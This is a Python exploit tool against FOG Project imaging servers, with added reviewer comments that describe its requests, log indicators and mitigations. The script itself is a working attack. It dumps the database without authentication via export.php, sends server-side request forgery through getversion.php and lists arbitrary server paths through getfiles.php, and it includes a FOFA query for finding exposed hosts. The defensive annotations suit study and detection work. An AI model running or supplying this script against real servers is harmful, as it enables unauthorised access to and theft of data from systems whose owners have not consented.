import requests
import argparse
import sys
from urllib.parse import quote

# FOFA search icon_hash="-1952619005"
# The line above is the original author's favicon-hash query. Asset owners can
# run the same query against their own address space to check whether a FOG
# management interface is reachable from the internet.
#
# Reviewer summary (defender's view of what this script sends):
#   * POST /fog/management/export.php?filename=HistoryReport&type=pdf
#       form fields: fogguiuser="", fogguipass="", nojson=4, export=3
#   * GET  /fog/service/getversion.php?url=<URL>
#   * GET  /fog/status/getfiles.php?path=<PATH>
# Every request carries an empty PHPSESSID cookie and no credentials, so the
# script only works where the server answers these endpoints for callers that
# have not logged in. The Origin and Referer headers are hard-coded to
# 192.168.43.133 (apparently the author's test host) whatever the target is;
# a mismatch between those headers and the server's own host name in the
# access log points to this script being run unmodified.
# Mitigation: keep the FOG web interface off untrusted networks, enforce
# authentication in front of these paths, restrict outbound connections from
# the server, and install a vendor release that fixes the endpoints (the page
# does not name one).
# NOTE(review): every request uses verify=False (TLS certificates are not
# checked) and no timeout (a stalled connection blocks the run indefinitely).


def _captured_headers():
    """Return a fresh copy of the browser-style headers used by every request."""
    return {
        "X-Requested-With": "XMLHttpRequest",
        "Accept-Language": "en-US,en;q=0.9",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36",
        "Origin": "http://192.168.43.133",
        "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }


def _blank_session():
    """Return the cookie jar used by every request: a PHPSESSID with no value."""
    return {"PHPSESSID": ""}


def print_cred():
    """Print the author credit banner."""
    print("[*] Fog project exploit by casp3r0x0 hassan al-khafaji")
    print("[*] GitHub: https://github.com/casp3r0x0")


def EXPDump(target):
    """POST to the report-export endpoint and save the response to output.txt.

    The session cookie and both credential fields are empty. The response body
    is written as-is to ``output.txt`` in the current directory; the CLI help
    describes it as a database dump, so treat that file as sensitive data.
    Raises ``requests.HTTPError`` on a 4xx/5xx answer, in which case no file
    is written.
    """
    print(f"[+] Target: {target}")
    print("[+] Dumping...")

    export_url = f"{target}/fog/management/export.php?filename=HistoryReport&type=pdf"
    form_fields = {"fogguiuser": '', "fogguipass": '', "nojson": "4", "export": "3"}
    response = requests.post(
        export_url,
        headers=_captured_headers(),
        cookies=_blank_session(),
        data=form_fields,
        verify=False,
    )
    response.raise_for_status()

    with open("output.txt", "w", encoding="utf-8") as out_file:
        out_file.write(response.text)
    print("[+] Dumped saved to output.txt")


def SSRF(target, url):
    """GET the version-check endpoint with ``url`` as its ``url`` parameter.

    ``url`` is percent-encoded with ``quote`` before being placed in the query
    string. The response body is not read or printed; only the HTTP status is
    checked. On the server side the thing to watch is ``getversion.php``
    requests whose ``url`` value is not a host the server is expected to
    contact.
    """
    print(f"[+] Target: {target}")
    print(f"[+] SSRF URL: {url}")

    version_url = f"{target}/fog/service/getversion.php?url={quote(url)}"
    response = requests.get(
        version_url,
        headers=_captured_headers(),
        cookies=_blank_session(),
        verify=False,
    )
    response.raise_for_status()
    print("[+] SSRF request sent")


def listfiles(target, path):
    """GET the file-listing endpoint for ``path`` and print the response body.

    NOTE(review): ``path`` is not passed through ``quote`` here, unlike the
    ``url`` argument of ``SSRF``.
    """
    print(f"[+] Target: {target}")
    print(f"[+] Path: {path}")

    listing_url = f"{target}/fog/status/getfiles.php?path={path}"
    response = requests.get(
        listing_url,
        headers=_captured_headers(),
        cookies=_blank_session(),
        verify=False,
    )
    response.raise_for_status()
    print("[+] List files request sent")
    print(response.text)


def main():
    """Parse the command line and run each requested action in a fixed order.

    Exits with status 1, after printing the help text, when none of
    ``--dump``, ``--SSRF`` or ``--listfiles`` is given.
    """
    parser = argparse.ArgumentParser(
        description="Exploit tool for FOGProject system by Casp3r0x0 Hassan Ali Al-khafaji"
    )
    parser.add_argument("-t", "--target", required=True, help="Target URL (mandatory)")
    parser.add_argument("--dump", action="store_true", help="dump full db from the target")
    parser.add_argument("--SSRF", metavar="URL", help="Execute SSRF function with specified URL")
    parser.add_argument("--listfiles", metavar="PATH", help="Execute listfiles function with specified path")
    args = parser.parse_args()

    # At least one action flag is required.
    if not (args.dump or args.SSRF or args.listfiles):
        print("Error: At least one action must be specified (--dump, --SSRF, or --listfiles)")
        parser.print_help()
        sys.exit(1)

    target = args.target

    # Same order as the flags are declared: dump, SSRF, listfiles. The banner
    # is printed before every action that runs.
    actions = (
        (args.dump, lambda: EXPDump(target)),
        (args.SSRF, lambda: SSRF(target, args.SSRF)),
        (args.listfiles, lambda: listfiles(target, args.listfiles)),
    )
    for requested, run in actions:
        if requested:
            print_cred()
            run()


if __name__ == "__main__":
    main()